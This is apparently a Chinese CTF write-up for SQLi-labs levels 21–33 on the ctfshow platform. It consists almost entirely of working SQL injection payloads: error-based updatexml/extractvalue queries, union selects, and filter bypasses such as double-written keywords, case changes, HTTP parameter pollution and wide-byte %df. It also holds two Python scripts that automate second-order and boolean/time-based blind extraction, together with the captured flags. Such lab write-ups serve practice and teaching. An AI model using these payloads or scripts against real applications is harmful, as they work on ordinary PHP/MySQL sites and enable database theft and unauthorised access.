SQLLABS 20-33

SQLLABS 20-33

第二十一关

记得base64编码
admin’) or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
admin’) or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
admin’) or updatexml(1,concat(0x26,(select left(group_concat(table_name),30) from information_schema.tables where table_schema=‘ctfshow’),0x26),1)#
admin’) or updatexml(1,concat(0x26,(select left(group_concat(column_name),30) from information_schema.columns where table_name=‘flag’),0x26),1)#
admin’) or updatexml(1,concat(0x26,(select right(group_concat(flag4),30) from ctfshow.flag),0x26),1)#
ctfshow{2e2f5457-7c1f-4c62-be9b-e60e06bcf98f}

第二十二关

把上面的’)改“
步骤差不多
ctfshow{58706930-1993-4c33-98d4-91326f15b2c2}

第二十三关

?id=1’or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)and ’
然后差不多
?id=1’or updatexml(1,concat(0x26,(select left(group_concat(table_name),30) from information_schema.tables where table_schema=‘ctfshow’),0x26),1)and ’
?id=1’or updatexml(1,concat(0x26,(select left(group_concat(column_name),30) from information_schema.columns where table_name=‘flag’),0x26),1)and ’
?id=1’or updatexml(1,concat(0x26,(select left(group_concat(flag4),30) from ctfshow.flag),0x26),1)and ’
ctfshow{c3322c5b-e92d-4b1b-82d0-d18b4f075da6}

第二十四关

可以改管理员密码。。不太会，查不到库里面的数据

You tried to be smart, Try harder!!! 😦
别骂了别骂了。。
admin’ or if(1=2,1,sleep(5)) #让服务器炸了
二次注入加时间盲注

import requests
session=requests.session()
i=0
result=""

for i in range(1,1290):
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # payload = f'if(ascii(substr((select group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1),0)'
        # payload = f'if(ascii(substr((select group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(0.7),0)'
        payload = 'if(ascii(substr((select group_concat(flag4)from(ctfshow.flag)),{},1))>{},sleep(1),0)'.format(i,mid)
        username = "admin' and {} or '2'='2".format(payload)
        url1 = 'http://58962273-3e5b-4881-8bef-750836065431.challenge.ctf.show:8080/login_create.php'
        data1 = {
            'username': username,
            'password': '1',
            're_password': '1',
            'submit': 'Register'
        }
        r1 = session.post(url1, data=data1)
        url2 = 'http://58962273-3e5b-4881-8bef-750836065431.challenge.ctf.show:8080/login.php'
        data2 = {
            'login_user': username,
            'login_password': '1',
            'mysubmit': 'Login',
        }
        r2 = session.post(url2, data=data2)
        url3 = 'http://58962273-3e5b-4881-8bef-750836065431.challenge.ctf.show:8080/pass_change.php'
        data3 = {
            'current_password': '1',
            'password': '2',
            're_password': '2',
            'submit': 'Reset'
        }

        try:
            r = session.post(url3,data=data3,timeout=0.9)
            tail = mid

        except:
            head = mid + 1


    if head !=32:
        result+=chr(head)
    else:
        break
    
    print(result)

第二十五关

报错注入,双写绕过也行
?id=1%27^extractvalue(1,concat(0x7e,(select(database()))))%23
?id=1’^updatexml(1,concat(0x26,(select group_concat(schema_name) from infoorrmation_schema.schemata),0x26),1)%23
?id=1’^updatexml(1,concat(0x26,(select left(group_concat(table_name),30) from infoorrmation_schema.tables where table_schema=‘ctfshow’),0x26),1)%23
?id=1’^updatexml(1,concat(0x26,(select left(group_concat(column_name),30) from infoorrmation_schema.columns where table_name=‘flags’),0x26),1)%23
?id=1’^updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
?id=1’^updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
ctfshow{80fa6629-bc4a-4564-93b9-106eee1fe209}

第二十五关a

?id=-1 union select 1,2,group_concat(schema_name)from infoorrmation_schema.schemata%23爆库名
?id=-1 union select 1,2,group_concat(table_name)from infoorrmation_schema.tables where table_schema=‘ctfshow’%23
?id=-1 union select 1,2,group_concat(column_name)from infoorrmation_schema.columns where table_name=‘flags’%23
?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags%23

第二十六关

?id=1’^extractvalue(1,concat(0x7e,(select(database())))) and’
?id=1’^updatexml(1,concat(0x26,(select(group_concat(schema_name))from(infoorrmation_schema.schemata)),0x26),1)anandd’
?id=1’^updatexml(1,concat(0x26,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(‘ctfshow’)),0x26),1)anandd’
?id=1’^updatexml(1,concat(0x26,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(‘ctfshow’)),0x26),1)anandd’
?id=1’^updatexml(1,concat(0x26,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)like(‘flags’)),0x26),1)anandd’
?id=1’^updatexml(1,concat(0x26,(select(right(group_concat(flag4s),30))from(ctfshow.flags)),0x26),1)anandd’
ctfshow{bbad336b-ea6c-4094-8888-c27b7a6ec0d0}
b-ea6c-4094-8888

第二十六关a

盲注

import requests
import time
url = "http://923efabc-d503-4bbd-a28d-8f1631620fe1.challenge.ctf.show:8080/"

result=""
for i in range(1,1290):
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # payload="?id=100')||if(ascii(substr((select(group_concat(schema_name))from(infoorrmation_schema.schemata)),{},1))>{},1,0)||('0".format(i,mid)
        # payload="?id=100')||if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{},1))>{},1,0)||('0".format(i,mid)
        #payload="?id=100')||if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{},1))>{},1,0)||('0".format(i,mid)
        payload="?id=100')||if(ascii(substr((select(flag4s)from(ctfshow.flags)),{},1))>{},1,0)||('0".format(i,mid)
        # print(url+payload)

        r=requests.get(url+payload)
        if "Your Password:Dumb" in r.text:
            head=mid+1
        else:
            tail=mid
    if head !=32:
        result+=chr(head)
    else:
        break
    
    print(result)

第二十七关

大写绕过，也可以用上面的脚本，大写绕过
?id=1’^updatexml(1,concat(0x26,(sElect(group_concat(schema_name))from(information_schema.schemata)),0x26),1)||‘0
?id=1’^updatexml(1,concat(0x26,(sElect(group_concat(table_name))from(information_schema.tables)),0x26),1)||‘0
?id=1’^updatexml(1,concat(0x26,(sElect(group_concat(column_name))from(information_schema.columns)),0x26),1)||‘0
?id=1’^updatexml(1,concat(0x26,(sElect(group_concat(flag4s))from(ctfshow.flags)),0x26),1)||‘0
ctfshow{33995233-b6a5-4717-b457-76add1addd7c}
?id=1’^updatexml(1,concat(0x26,(sElect(right(group_concat(flag4s),30))from(ctfshow.flags)),0x26),1)||'0
3-b6a5-4717-b457-76add1addd7c}

第二十七关a

把教本的’)换成"
ctfshow{673c8abe-5548-48b4-b1b7-0338d3f4d45e}

第二十八关

用脚本闭合 ')

第二十八关a

不能报错注入用脚本

第二十九关

http参数污染
waf解析前者，服务器解析后者
?id=1&id=-2’union select 1,2,group_concat(flag4s) from ctfshow.flags %23
ctfshow{97c5088d-09f4-413c-a515-de989a1c32fe}

第三十关

?id=1&id=-2“union select 1,2,group_concat(flag4s) from ctfshow.flags %23

第三十一关

?id=1&id=-2")union select 1,2,group_concat(flag4s) from ctfshow.flags %23

第三十二关

宽字节注入 %df 吃
?id=-2%df’union select 1,2,group_concat(flag4s) from ctfshow.flags %23

第三十三关

一样